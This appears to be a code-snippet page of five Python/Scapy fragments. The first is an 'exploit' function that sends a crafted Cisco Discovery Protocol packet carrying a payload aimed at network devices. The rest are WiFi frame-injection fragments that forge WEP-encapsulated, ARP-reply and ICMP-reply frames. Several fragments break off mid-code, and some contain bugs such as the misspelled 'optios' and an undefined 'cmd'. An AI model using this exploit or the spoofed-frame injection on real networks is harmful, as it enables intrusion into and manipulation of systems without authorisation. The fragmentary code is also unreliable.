Exemple #1
0
def exploit(payload):
    # link layer
    l2_packet = Ether(dst="01:00:0c:cc:cc:cc")
    # Logical-Link Control
    l2_packet /= LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP()
    # Cisco Discovery Protocol
    cdp_v2 = cdp.CDPv2_HDR(vers=2, ttl=180)
    deviceid = cdp.CDPMsgDeviceID(val=cmd)
    portid = cdp.CDPMsgPortID(iface=b"ens38")
    address = cdp.CDPMsgAddr(naddr=1,
                             addr=cdp.CDPAddrRecordIPv4(addr="192.168.204.77"))
    cap = cdp.CDPMsgCapabilities(cap=1)
    power_req = cdp.CDPMsgUnknown19(val=payload)
    power_level = cdp.CDPMsgPower(power=16)
    cdp_packet = cdp_v2 / deviceid / portid / address / cap / power_req / power_level
    packet = l2_packet / cdp_packet
    sendp(packet)
Exemple #2
0
    def handle_read(self):
        # | 4 bytes | 4 bytes |   18 bytes   |     1500 bytes    |
        #     Tap       VLAN    Ether Header          Frame
        buf = self.read(1526)
        eth_rcvd_frame = Ether(buf[4:])

        #if DEBUG:
        #    os.write(1,"Received from %s\n" % ifname)
        #    if VERB:
        #        os.write(1,"%s\n" % eth_rcvd_frame.summary())

        # Prepare Dot11 frame for injection
        dot11_sent_frame = self.radiotap()

        dot11_sent_frame /= Dot11(type="Data",
                                  FCfield="from-DS",
                                  addr1=eth_rcvd_frame.getlayer(Ether).dst,
                                  addr2=self._tap.bssid)

        # It doesn't seem possible to set tuntap interface MAC address
        # when we create it, so we set source MAC here
        if self._tap.smac == '':
            dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
        else:
            dot11_sent_frame.addr3 = self._tap.smac

        if self._tap.has_wep:
            dot11_sent_frame.FCfield |= 0x40
            dot11_sent_frame /= Dot11WEP(iv="111", keyid=self._tap.key_id)

        dot11_sent_frame /= LLC(ctrl=3) / SNAP(code=eth_rcvd_frame.getlayer(
            Ether).type) / eth_rcvd_frame.getlayer(Ether).payload

        #if DEBUG:
        #    os.write(1,"Sending from-DS to %s\n" % OUT_IFACE)
        #    if VERB:
        #        os.write(1,"%s\n" % dot11_sent_frame.summary())

        # Frame injection :
        sendp(dot11_sent_frame, verbose=0)  # Send from-DS frame
Exemple #3
0
                    if optios.verb:
                        os.write(1, "%s\n" % dot11_frame.summary())

                # Building ARP Reply answer for injection
                dot11_answer = RadioTap() / Dot11(
                    type="Data",
                    FCfield="from-DS",
                    addr1=dot11_frame.getlayer(Dot11).addr2,
                    addr2=options.bssid)
                dot11_answer.addr3 = options.smac

                if options.wepkey is not None:
                    dot11_answer.FCfield |= 0x40
                    dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid)

                dot11_answer /= LLC(ctrl=3) / SNAP() / ARP(
                    op="is-at",
                    hwsrc=options.smac,
                    psrc=dot11_frame.getlayer(ARP).pdst,
                    hwdst=dot11_frame.getlayer(ARP).hwsrc,
                    pdst=dot11_frame.getlayer(ARP).psrc)

                dot11_answer /= dot11_frame.getlayer(ARP).payload

                if options.debug:
                    os.write(1, "Sending ARP Reply on %s\n" % optios.out_iface)
                    if options.verb:
                        os.write(1, "%s\n" % dot11_answer.summary())

                # Frame injection :
                sendp(dot11_answer, verbose=0)  # Send frame
Exemple #4
0
            dot11_sent_frame = RadioTap() / Dot11(
                type="Data",
                FCfield="from-DS",
                addr1=eth_rcvd_frame.getlayer(Ether).dst,
                addr2=BSSID)
            # It doesn't seem possible to set tuntap interface MAC address
            # when we create it, so we set source MAC here
            if not HAS_SMAC:
                dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
            else:
                dot11_sent_frame.addr3 = SMAC
            if WEP:
                dot11_sent_frame.FCfield |= 0x40
                dot11_sent_frame /= Dot11WEP(iv="111", keyid=KEYID)
            dot11_sent_frame /= LLC(ctrl=3) / SNAP(
                code=eth_rcvd_frame.getlayer(
                    Ether).type) / eth_rcvd_frame.getlayer(Ether).payload

            if DEBUG:
                os.write(1, "Sending from-DS to %s\n" % OUT_IFACE)
                if VERB:
                    os.write(1, "%s\n" % dot11_sent_frame.summary())

# Frame injection :
            sendp(dot11_sent_frame, verbose=0)  # Send from-DS frame

# Frame from WiFi network
        if s in r:

            # 802.11 maximum frame size is 2346 bytes (cf. RFC3580)
            # However, WiFi interfaces are always MTUed to 1500
Exemple #5
0
                                         addr1 = dot11_frame.getlayer(Dot11).addr2,
                                         addr2 = options.bssid)
 
             if options.smac is None:
                 dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1
             else:
                 dot11_answer.addr3 = options.smac
 
             if options.wepkey is not None:
 
                 dot11_answer.FCfield |= 0x40
 
                 dot11_answer /= Dot11WEP(iv="111",
                                        keyid=options.keyid)
 
             dot11_answer /= LLC(ctrl=3)/SNAP()/IP(src=dot11_frame.getlayer(IP).dst,
                                                 dst=dot11_frame.getlayer(IP).src,
                                                 ttl=options.ttl)
 
             dot11_answer /= ICMP(type="echo-reply",
     	                        id=dot11_frame.getlayer(ICMP).id,
     	                        seq=dot11_frame.getlayer(ICMP).seq)
 
             dot11_answer /= dot11_frame.getlayer(ICMP).payload
     
         if options.debug:
             os.write(1,"Sending ICMP Echo Reply on %s\n" % options.out_iface)
             if options.verb:
                 os.write(1,"%s\n" % dot11_answer.summary())
 
         # Frame injection :